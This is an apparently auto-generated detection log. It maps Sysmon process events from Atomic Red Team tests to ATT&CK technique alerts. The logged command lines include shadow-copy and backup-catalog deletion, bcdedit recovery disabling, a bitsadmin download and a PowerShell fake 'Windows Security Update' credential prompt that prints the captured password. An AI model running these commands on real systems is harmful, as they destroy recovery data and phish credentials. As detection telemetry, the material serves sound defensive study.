C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb + C:\Windows\AppPatch\Custom\ + EXAMPLE\user01 + 365ABB72-5417-5C91-0000-002035340300 + 0x33435 + 1 + High + MD5=C648901695E275C8F2AD04B687A68CE2,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-543D-5C91-0000-001099A60300 + 2984 + C:\Windows\explorer.exe + C:\Windows\Explorer.EXE + +",PC01.example.corp,Microsoft-Windows-Sysmon/Operational 
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1553030551.500169,2019-03-20T01:22:31.500169+04:00,,Threat,High,"Found User (EXAMPLE\user01) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1966541 + + + + + Microsoft-Windows-Sysmon/Operational + PC01.example.corp + + + + + + 2019-03-19 21:22:28.806 + 365ABB72-5D94-5C91-0000-001080E90F00 + 3840 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb + C:\Windows\AppPatch\Custom\ + EXAMPLE\user01 + 365ABB72-5417-5C91-0000-002035340300 + 0x33435 + 1 + High + MD5=C648901695E275C8F2AD04B687A68CE2,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-543D-5C91-0000-001099A60300 + 2984 + C:\Windows\explorer.exe + C:\Windows\Explorer.EXE + +",PC01.example.corp,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547710.640915,2019-07-19T18:48:30.640915+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3656 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:48:05.349 + 747F3D96-D825-5D31-0000-0010CF222C00 + 5808 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 
747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1553030551.500169,2019-03-20T01:22:31.500169+04:00,,Threat,High,"Found User (EXAMPLE\user01) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1966541 + + + + + Microsoft-Windows-Sysmon/Operational + PC01.example.corp + + + + + + 2019-03-19 21:22:28.806 + 365ABB72-5D94-5C91-0000-001080E90F00 + 3840 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb + C:\Windows\AppPatch\Custom\ + EXAMPLE\user01 + 365ABB72-5417-5C91-0000-002035340300 + 0x33435 + 1 + High + MD5=C648901695E275C8F2AD04B687A68CE2,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-543D-5C91-0000-001099A60300 + 2984 + C:\Windows\explorer.exe + C:\Windows\Explorer.EXE + +",PC01.example.corp,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547684.13141,2019-07-19T18:48:04.131410+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "bitsadmin.exe /transfer /Download /priority Foreground 
https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3654 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:48:04.094 + 747F3D96-D824-5D31-0000-001023F42B00 + 6736 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547684.103366,2019-07-19T18:48:04.103366+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3653 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:47:57.265 + 747F3D96-D81D-5D31-0000-0010D7CD2B00 + 7080 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + 
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547677.274199,2019-07-19T18:47:57.274199+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "sdelete.exe C:\some\file.txt" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3652 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:47:57.189 + 747F3D96-D81D-5D31-0000-0010B8CA2B00 + 1632 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "sdelete.exe C:\some\file.txt" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547677.227966,2019-07-19T18:47:57.227966+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3651 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:47:51.972 + 747F3D96-D817-5D31-0000-0010C8BA2B00 + 7040 + 
C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547672.010791,2019-07-19T18:47:52.010791+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "bcdedit.exe /set {default} recoveryenabled no" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3649 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:47:51.899 + 747F3D96-D817-5D31-0000-001049B42B00 + 6216 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "bcdedit.exe /set {default} recoveryenabled no" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547671.865963,2019-07-19T18:47:51.865963+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running 
image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3647 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:47:51.784 + 747F3D96-D817-5D31-0000-001064AD2B00 + 6508 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547666.302556,2019-07-19T18:47:46.302556+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3645 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:47:46.104 + 747F3D96-D812-5D31-0000-0010AC892B00 + 2948 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + 
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1553037538.288766,2019-03-20T03:18:58.288766+04:00,,Threat,Low,Found User (EXAMPLE\user01) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" /c msg * "hello from run key" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1966704 + + + + + Microsoft-Windows-Sysmon/Operational + PC01.example.corp + + + + + + 2019-03-19 23:18:42.516 + 365ABB72-78D2-5C91-0000-0010D8A50200 + 2572 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\cmd.exe" /c msg * "hello from run key" + C:\Windows\system32\ + EXAMPLE\user01 + 365ABB72-77C4-5C91-0000-0020AD7D0100 + 0x17dad + 1 + High + MD5=AD7B9C14083B52BC532FBA5948342B98,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-785E-5C91-0000-00103FEA0100 + 1928 + C:\Windows\explorer.exe + C:\Windows\Explorer.EXE + +",PC01.example.corp,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547665.624944,2019-07-19T18:47:45.624944+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "wbadmin.exe delete catalog -quiet" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3641 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:47:45.569 + 747F3D96-D811-5D31-0000-001000632B00 + 4500 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® 
Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "wbadmin.exe delete catalog -quiet" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547665.585327,2019-07-19T18:47:45.585327+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3640 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:47:40.849 + 747F3D96-D80C-5D31-0000-001005542B00 + 1348 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547660.70604,2019-07-19T18:47:40.706040+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "vssadmin.exe delete shadows /all /quiet" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 
0x8000000000000000 + + + 3638 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:47:40.568 + 747F3D96-D80C-5D31-0000-0010223C2B00 + 6896 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "vssadmin.exe delete shadows /all /quiet" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547660.691438,2019-07-19T18:47:40.691438+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3637 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:47:37.170 + 747F3D96-D809-5D31-0000-001072292B00 + 980 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] 
Command-Line Interface,1563547657.127263,2019-07-19T18:47:37.127263+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3633 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:47:37.083 + 747F3D96-D809-5D31-0000-00100A242B00 + 3968 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T1086 ] Powershell with Suspicious Argument,1563547641.972037,2019-07-19T18:47:21.972037+04:00,,Threat,Critical,"Found User (MSEDGEWIN10\IEUser) run Suspicious PowerShell commands that include (powershell,PromptForCredential,powershell,PromptForCredential) in event with Command Line (powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine ("C:\Windows\system32\cmd.exe" /c "powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, 
[Environment]::UserDomainName); echo .GetNetworkCredential().Password;}") in directory : ( C:\AtomicRedTeam\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3631 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:46:51.935 + 747F3D96-D7DB-5D31-0000-0010B5A82A00 + 4452 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;} + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F + 747F3D96-D7DB-5D31-0000-001089A52A00 + 4256 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1086] PowerShell Process found,1563547641.972037,2019-07-19T18:47:21.972037+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;} )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3631 + + + + + 
Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:46:51.935 + 747F3D96-D7DB-5D31-0000-0010B5A82A00 + 4452 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;} + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F + 747F3D96-D7DB-5D31-0000-001089A52A00 + 4256 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547611.957887,2019-07-19T18:46:51.957887+04:00,,Threat,Low,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}" )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3630 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:46:51.871 + 747F3D96-D7DB-5D31-0000-001089A52A00 + 4256 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + 
Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T0000 ] Suspicious process name detected,1563547579.443587,2019-07-19T18:46:19.443587+04:00,,Threat,High,User Name : ( MSEDGEWIN10\IEUser ) with Command Line : ( "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /r:System.EnterpriseServices.dll /target:library /keyfile:key.snk C:\AtomicRedTeam\atomics\T1121\src\T1121.cs ) contain suspicious command ( \csc.exe),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3617 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:46:19.023 + 747F3D96-D7BB-5D31-0000-0010E7FE2900 + 2056 + C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe + 4.7.3190.0 built by: NET472REL1LAST_C + Visual C# Command Line Compiler + Microsoft® .NET Framework + Microsoft Corporation + "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /r:System.EnterpriseServices.dll /target:library /keyfile:key.snk C:\AtomicRedTeam\atomics\T1121\src\T1121.cs + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + 
